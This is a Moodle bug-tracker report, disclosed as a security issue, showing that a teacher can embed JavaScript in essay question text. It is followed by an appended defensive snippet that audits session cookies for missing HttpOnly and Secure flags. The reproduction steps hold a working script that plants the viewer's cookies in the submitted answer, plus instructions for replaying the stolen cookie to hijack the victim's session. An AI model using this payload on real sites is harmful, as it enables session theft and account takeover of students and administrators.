  1. Moodle
  2. MDL-50635

Essay JavaScript injection + cookie theft


    • Bug
    • Resolution: Not a bug
    • Minor
    • None
    • 2.9
    • JavaScript, Questions
    • None
    • MOODLE_29_STABLE

      By default, a teacher can insert any JavaScript code into the Question text field.
      So a teacher can interact with and get private information from students (or anyone who answers the question, even an administrator).

      Reproduce the bug

      1. Create an essay.
      2. Fill the question text field with the following, in HTML mode:

        A basic question text.
        <script>
        <!--
        ( function(){
        	window.addEventListener('load', function() {
        		var next = document.getElementById('responseform').next;
        		if ('undefined' != typeof next) {
        			next.addEventListener('click', function (event) {
        				document.getElementsByTagName('textarea')[0].value += "<a href='" + document.cookie + "'> </a>";
        			});
        		}
        	})
        } )();
        -->
        </script>
        

      3. Create a Quiz containing the question.
      4. Answer the question with any user.
      5. Inspect the answer and find stolenCookie in the href attribute of the empty a tag.
      6. Type the following code in the console of any other browser:

        document.cookie = stolenCookie;
        

      7. Refresh the page.
      8. You are now logged in with the victim's session.

      More information

      Done with an HTTPS connection and the Atto editor (probably works with others if we adjust the injected code).

            timhunt Tim Hunt
            holyhope Pierre Péronnet
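
Step 5 of the report depends on `document.cookie` returning the session cookie to page script. The following is an added example, not part of the original issue or of Moodle's code: it audits `Set-Cookie` headers for a session cookie that script can read. The cookie name `MoodleSession`, the `theme_pref` cookie and all header values are constructed sample data.

```javascript
// Constructed sample headers: the same site with and without HttpOnly on the session cookie.
const WITHOUT_HTTPONLY = [
  'MoodleSession=constructed0session0id; path=/; secure',
  'theme_pref=dark; path=/',
];
const WITH_HTTPONLY = [
  'MoodleSession=constructed0session0id; path=/; secure; HttpOnly',
  'theme_pref=dark; path=/',
];

// Split one Set-Cookie header into name, value and lower-cased attributes.
function parseSetCookie(line) {
  const [pair, ...attrs] = line.split(';').map((s) => s.trim());
  const eq = pair.indexOf('=');
  const cookie = {
    name: eq === -1 ? '' : pair.slice(0, eq),
    value: eq === -1 ? pair : pair.slice(eq + 1),
    flags: {},
  };
  for (const attr of attrs) {
    if (!attr) continue;
    const i = attr.indexOf('=');
    const key = (i === -1 ? attr : attr.slice(0, i)).toLowerCase();
    cookie.flags[key] = i === -1 ? true : attr.slice(i + 1);
  }
  return cookie;
}

// The string a page script would get from document.cookie: browsers leave
// HttpOnly cookies out. Path, domain and expiry matching are ignored here.
function scriptVisibleCookies(setCookieLines) {
  return setCookieLines
    .map(parseSetCookie)
    .filter((c) => !c.flags.httponly)
    .map((c) => `${c.name}=${c.value}`)
    .join('; ');
}

// Report missing flags on the named session cookie.
function auditSessionCookie(setCookieLines, sessionName) {
  const findings = [];
  for (const c of setCookieLines.map(parseSetCookie)) {
    if (c.name !== sessionName) continue;
    if (!c.flags.httponly) findings.push(`${c.name}: missing HttpOnly (readable via document.cookie)`);
    if (!c.flags.secure) findings.push(`${c.name}: missing Secure (sent over plain HTTP)`);
  }
  return findings;
}
```

HttpOnly only keeps the session identifier out of `document.cookie`; script placed in the question text still runs in the answering user's session.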